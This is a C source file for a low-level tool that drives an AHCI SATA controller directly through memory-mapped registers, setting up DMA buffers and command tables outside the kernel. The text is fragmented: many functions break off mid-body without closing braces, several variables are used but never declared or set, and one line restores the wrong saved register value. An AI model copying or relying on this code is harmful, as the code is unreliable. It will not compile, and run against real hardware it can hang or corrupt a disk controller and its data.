EM_CTL_TM = (1 << 8), /* Transmit Message */
EM_CTL_MR = (1 << 0), /* Message Received */
EM_CTL_ALHD = (1 << 26), /* Activity LED */
EM_CTL_XMT = (1 << 25), /* Transmit Only */
EM_CTL_SMB = (1 << 24), /* Single Message Buffer */
EM_CTL_SGPIO = (1 << 19), /* SGPIO messages supported */
EM_CTL_SES = (1 << 18), /* SES-2 messages supported */
EM_CTL_SAFTE = (1 << 17), /* SAF-TE messages supported */
EM_CTL_LED = (1 << 16), /* LED messages supported */
/* em message type */
EM_MSG_TYPE_LED = (1 << 0), /* LED */
EM_MSG_TYPE_SAFTE = (1 << 1), /* SAF-TE */
EM_MSG_TYPE_SES2 = (1 << 2), /* SES-2 */
EM_MSG_TYPE_SGPIO = (1 << 3), /* SGPIO */
};
void
usage(char *p)
{
printf("%s <opts>\n"
" -b Bus ID\n"
" -d Device ID\n"
" -f Function ID\n"
" -a BAR (phys addr)\n"
" -p Number of pages to map\n"
" -h This usage info\n"
"Ex: %s -b 02 -d 05 -f 0 -a 0xfd5ee000 -p 1\n"
, p, p);
/* This is meant to mimic the output from dmesg | grep AHCI . If there is a
* match then we know at least we have the right mem location */
void
print_ahci_info(ahci_host_t *p)
{
uint32_t speed;
char * speed_s;
ctl = p->ctl;
if ((ctl & HOST_RESET) == 0) {
printf("resetting...\n");
p->ctl = (ctl | HOST_RESET);
ctl = p->ctl;
}
sleep(2);
ctl = p->ctl;
if (ctl & HOST_RESET) {
void *
ahci_port_base(char * p)
{
return p + PORT_OFFSET;
}
hba_port_t *
ahci_port_entry(char * p, int port_num)
{
return (hba_port_t *)((p + PORT_OFFSET) + (port_num * PORT_SIZE));
}
void
print_interrupt_bits(int ie)
{
if (ie & PORT_IRQ_D2H_REG_FIS)
printf("\tPORT_IRQ_D2H_REG_FIS\n");
if (ie & PORT_IRQ_PIOS_FIS)
printf("\tPORT_IRQ_PIOS_FIS\n");
if (ie & PORT_IRQ_DMAS_FIS)
printf("\tPORT_IRQ_DMAS_FIS\n");
if (ie & PORT_IRQ_SDB_FIS)
printf("\tPORT_IRQ_SDB_FIS\n");
if (ie & PORT_IRQ_UNK_FIS)
printf("\tPORT_IRQ_UNK_FIS\n");
if (ie & PORT_IRQ_SG_DONE)
printf("\tPORT_IRQ_SG_DONE\n");
if (ie & PORT_IRQ_CONNECT)
printf("\tPORT_IRQ_CONNECT\n");
if (ie & PORT_IRQ_DEV_ILCK)
printf("\tPORT_IRQ_DEV_ILCK\n");
if (ie & PORT_IRQ_PHYRDY)
printf("\tPORT_IRQ_PHYRDY\n");
if (ie & PORT_IRQ_BAD_PMP)
printf("\tPORT_IRQ_BAD_PMP\n");
if (ie & PORT_IRQ_OVERFLOW)
printf("\tPORT_IRQ_OVERFLOW\n");
if (ie & PORT_IRQ_IF_NONFATAL)
printf("\tPORT_IRQ_IF_NONFATAL\n");
if (ie & PORT_IRQ_IF_ERR)
void
print_command_bits(int cmd)
{
if (cmd & PORT_CMD_START)
printf("\tPORT_CMD_START\n");
if (cmd & PORT_CMD_SPIN_UP)
printf("\tPORT_CMD_SPIN_UP\n");
if (cmd & PORT_CMD_POWER_ON)
printf("\tPORT_CMD_POWER_ON\n");
if (cmd & PORT_CMD_CLO)
printf("\tPORT_CMD_CLO\n");
if (cmd & PORT_CMD_FIS_RX)
printf("\tPORT_CMD_FIS_RX\n");
if (cmd & PORT_CMD_FIS_ON)
printf("\tPORT_CMD_FIS_ON\n");
if (cmd & PORT_CMD_LIST_ON)
printf("\tPORT_CMD_LIST_ON\n");
if (cmd & PORT_CMD_PMP)
printf("\tPORT_CMD_PMP\n");
if (cmd & PORT_CMD_FBSCP)
printf("\tPORT_CMD_FBSCP\n");
if (cmd & PORT_CMD_ATAPI)
printf("\tPORT_CMD_ATAPI\n");
if (cmd & PORT_CMD_ALPE)
printf("\tPORT_CMD_ALPE\n");
if (cmd & PORT_CMD_ASP)
printf("\tPORT_CMD_ASP\n");
}
void
print_ahci_port(hba_port_t * p)
{
printf("command list base address: 0x%x\n", p->clb);
printf("FIS base address: 0x%x\n", p->fb);
printf("interrupt status: 0x%x\n", p->is);
print_interrupt_bits(p->is);
void
start_cmd(hba_port_t *p)
{
printf("Waiting for PORT_CMD_START\n");
while(p->cmd & PORT_CMD_START);
printf("PORT_CMD_START is off\n");
p->cmd |= PORT_CMD_FIS_RX;
p->cmd |= PORT_CMD_START;
printf("Started cmd engine\n");
}
void
stop_cmd(hba_port_t *p)
{
int cmd;
printf("Before:\n");
print_command_bits(p->cmd);
p->cmd &= ~PORT_CMD_START;
cmd = p->cmd; // flush
/* XXX - This should use the ports_impl member to actually find the first one
instead */
int32_t
find_inuse_port(ahci_host_t *p)
{
int32_t port;
int32_t port_count;
hba_port_t * hbap;
return -1;
}
/* For larger data transfers we would have issue here with forcing adjacent
physical pages
needed for dma? If you do one 512 sector at a time it might be okay though */
char *
alloc_phy(uint32_t len, uint64_t * phy)
{
char * vaddr;
static int32_t pmap = 0;
if (len > PAGE_SIZE) {
}
vaddr = mmap(NULL, len, PROT_READ | PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1,
0);
if ((int64_t)vaddr == -1) {
perror("mmap");
exit(EXIT_FAILURE);
}
// Touch it to be sure it's actually mapped
memset(vaddr, 0, len);
// Lock it to ensure it doesnt get swapped during dma or something
mlock(vaddr, len);
if (!pmap) {
pmap = open_pmap();
}
*phy = vaddr_to_paddr(pmap, (uint64_t)vaddr);
return vaddr;
}
void
disable_interrupts(ahci_host_t * p)
{
uint32_t ctl;
void
enable_interrupts(ahci_host_t * p)
{
uint32_t ctl;
ctl = p->ctl | HOST_IRQ_EN;
p->ctl = ctl;
ctl = p->ctl; // flush
if (ctl & HOST_IRQ_EN) {
int32_t
main(int32_t argc, char **argv)
{
uint32_t c;
char path[PATH_MAX];
int32_t fd;
char * bus;
char * device;
char * function;
uint32_t sbus, sdevfn, svend;
unsigned long bar, sbar =0;
uint32_t total_read_size;
ahci_host_t * p;
char * ptr;
char * dma; // data sent and recieved via scatter/gather
uint64_t dma_phy;
char * cmd_list; // new address of command list
uint64_t cmd_list_phy;
char * cmd; // address of command table
uint64_t cmd_phy;
char * fis_buf; // address to receive FIS responses
uint64_t fis_buf_phy;
unsigned int num_pages;
uint32_t orig_cmd_list;
uint32_t orig_cmd_listu;
uint32_t orig_fis;
uint32_t orig_fisu;
struct host_to_dev_fis fis;
struct dma_setup_fis setup_fis;
struct cmd_hdr * cmd_hdr;
struct cmd_sg * cmd_sg;
int32_t fis_len;
int32_t buf_len;
int32_t tmp;
int32_t i;
int32_t complete;
int32_t done;
fd = open(path, O_RDWR);
if (fd == -1) {
printf("Failed to open: %s\n", path);
perror("open");
exit(1);
}
print_ahci_info((ahci_host_t *) ptr);
p = (ahci_host_t *)ptr;
// Disable interrupts for this device so the kernel doesn't get involved.
// This obviously breaks if it's the main disk, since it will stop
// working...
disable_interrupts(p);
/* This means the FIS DMA setup functionality is hidden by the AHCI
* controller itself, and it will copy to our buffers, specified via SG in
* other FIS directly */
if (p->cap & HOST_CAP_NCQ) {
printf("Supports native command queuing\n");
}
hba_port_t * hbap;
hbap = ahci_port_entry((char *)p, tport);
// if you want to just crash a machine you can zero out everything
//memset(hbap, 0, sizeof(hba_port_t));
orig_fis = hbap->fb;
orig_fisu = hbap->fbu;
orig_cmd_list = hbap->clb;
orig_cmd_list = hbap->clbu;
memset(&fis, 0, sizeof(fis));
memset(&setup_fis, 0, sizeof(setup_fis));
complete = 0;
printf("interrupt status after: 0x%x\n", hbap->is);
print_interrupt_bits(hbap->is);
// Wait for something to use our physical address
printf("Waiting for command completion\n");
done = 0;
while(!done) {
if ((hbap->ci & 1) == 0 && !complete) {
printf("Seems to have completed...\n");
complete = 1;
}
else if (!complete) {
printf("wasn't complete\n");
}
if ((hbap->is & PORT_IRQ_TF_ERR)) {
print_interrupt_bits(hbap->is);
print_ahci_port(hbap);
printf("Taskfile error\n");
printf("tfd : 0x%x\n", hbap->tfd);
printf("DIAG error\n");
printf("diag : 0x%x\n", hbap->serr);
hexdump(dma, 256);
break;
}
sleep(1);
hbap->fb = orig_fis;
hbap->fbu = orig_fisu;
hbap->clb = orig_cmd_list;
hbap->clbu = orig_cmd_listu;
enable_interrupts(p);
munmap(dma, PAGE_SIZE);
munmap(cmd_list, PAGE_SIZE);
munmap(cmd, PAGE_SIZE);
munmap(fis_buf, PAGE_SIZE);
munmap(ptr, total_read_size);
close(fd);
return 0;
}